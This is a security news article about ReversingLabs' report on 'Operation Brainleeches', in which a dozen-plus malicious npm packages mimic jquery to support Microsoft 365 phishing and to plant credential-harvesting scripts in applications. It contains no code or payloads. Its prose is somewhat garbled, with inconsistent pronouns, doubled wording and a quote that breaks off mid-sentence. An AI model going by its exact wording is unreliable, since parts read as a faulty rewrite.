Several malicious npm packages on open source repositories have been used in supply chain attacks and phishing campaigns.
The allegations come from ReversingLabs researchers, who said in a blog post published Thursday that the package impacts end users of the application, as well as email-based email attacks that primarily target Microsoft 365 users. He said it poses a double threat of also supporting phishing attacks.
Software threat researcher Lucija Valentić said his team found more than a dozen malicious npm packages posted between May 11th and June 13th.
These packages mimicked legitimate modules such as jquery that have millions of downloads every week. The malicious package was downloaded about 1000 times, but was quickly removed from npm after detection.
ReversingLabs dubbed the campaign “Operation Brainleeches” due to the use of malicious infrastructure to facilitate the theft of victims’ data.
During the first part of the campaign, researchers identified six packages used exclusively for phishing attacks. These packages were linked to phishing campaigns that collected user data through fake Microsoft.com login forms delivered through malicious email attachments.
The second tranche consisted of seven packages targeting email phishing campaigns and software supply chain attacks. These packages were intended to embed credential harvesting scripts in applications that unknowingly included malicious npm packages.
Read more about similar threats: Malicious Spam Campaign Downs npm Registry
ReversingLabs analysis reveals that malicious npm packages are involved in active phishing campaigns, likely executed by low-skilled attackers. The full extent of the supply chain attack is unknown, but the use of obfuscated code and calls to common package names such as jquery raise concerns about potential compromise.
Valentić said the findings underscore the importance of organizations staying vigilant against malicious or compromised open source packages.
“This campaign further underscores the need for organizations to pay attention to signs that open source packages may be malicious or compromised. Not paying attention is the cause, but it’s not the only one,” she added.
“The use of obfuscated code is a serious red flag. Other indicators include suspicious naming and package versioning, new packages with rough histories, smaller than expected downloads and dependencies, etc. will be
Probing the functionality and behavior of third-party code and tracking dependencies is also important for detecting potential threats.
